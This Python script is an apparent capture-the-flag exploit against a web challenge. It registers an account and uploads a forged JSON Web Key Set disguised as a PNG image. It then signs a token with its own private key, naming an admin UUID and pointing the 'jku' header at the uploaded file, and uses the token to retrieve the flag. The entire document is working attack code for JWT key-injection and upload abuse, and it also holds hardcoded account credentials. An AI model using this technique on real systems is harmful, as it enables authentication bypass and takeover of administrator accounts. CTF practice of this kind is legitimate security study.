#!/usr/bin/env python3
#exploit written by ryn0(krn_bhargav)
from requests import Session,get
from bs4 import BeautifulSoup
import jwt
url = 'http://chall.nitdgplug.org:30623'

pub_key = open('pub.key','r').read()
pvt_key = open('pvt.key','r').read()
n='AL2dm+Myrfhs96B/kMzGkxeUnkuSDBf9axQ2PvRBLGCAo5CpCwNJBIS5pjr9InHCuJhs4486tZt3Fplxe9KmpnJQpuN7Q/LU6ZAF2QXsdWmj1IkLjYJ+7iecCSSZZjtiPtnZN/Pkyv/1FjxWm8p9pHoVjJ+dcw9TtufaAzJ2jilBQrhUFSPEu5863vyJT1Ov1otuTg12C7rs13RCcSaQhpf9lRmYM1HZ0aiqLgrQO+PPaGWYnk42hJHgn2TVsLt4+fkCaVzx7zHQ52dzLoAr+DKOCu9NcEzHKNSQRqlv+OwP2dLcPiRtdO9KnBT1V5j5UilKIU9lCAJOX43ZEDHZycU='
kid='ryn0'
username = 'ryn0_123'
password = 'best_of_future_from_ryn0'
admin_uuid = '683999a1-8bea-4278-876a-5ba278ea7917'
s = Session()
def register():
  try:
    r = s.post(url+'/register',data={'username':username,'password':password},allow_redirects=False)
    if r.status_code == 302:
      return True
    return False
  except Exception as e:
    print(e)

def login():
  try:
    r = s.post(url+'/login',data={'username':username,'password':password},allow_redirects=False)
    if r.status_code == 302:
      return True
    return False
  except Exception as e:
    print(e)


def upload_jwt():
  payload='{"keys":[{"alg":"RS256","e":"AQAB","kid":"'+kid+'","kty":"RSA","n":"'+n+'}","use":"sig"}]}'
  with open('payload.png','w') as fl:
    fl.write(payload)

  try:
    r = s.post(url+'/uploads',files={'fileUpload':('payload.png',open('payload.png','rb'))})
    if(r.status_code == 200):
      soap = BeautifulSoup(r.text,'lxml')
      img=soap.find('img',{'class':'card-img-top'})
      return '/'+ str(img['src'])
    return None
  except Exception as e:
    print(e)
def generateMaliciousJWT(jku):
  return jwt.encode({'uuid':admin_uuid},pvt_key,algorithm='RS256',headers={
    'kid':kid,
    'jku':url+jku
  })

def getFlag(jt):
  try:
    r = get(url+'/gallery',cookies={'session':str(jt.decode())})
    if(r.status_code == 200 ):
      soup = BeautifulSoup(r.text,'lxml')
      return soup.find('h2').text
  except Exception as e:
    print(e)
if __name__ == '__main__':
  if(register()):
    print('[+] Register Successfull')
    if(login()):
      print('[+] login Successfull')
      jku = upload_jwt()
      if(jku):
        jt=generateMaliciousJWT(jku)
        print(f'jwt generated : {jt}\n\n')
        print(f'flag : {getFlag(jt)}')
    else:
      print('[-] Not able to login')
  else:
    print('[-] Not able to register')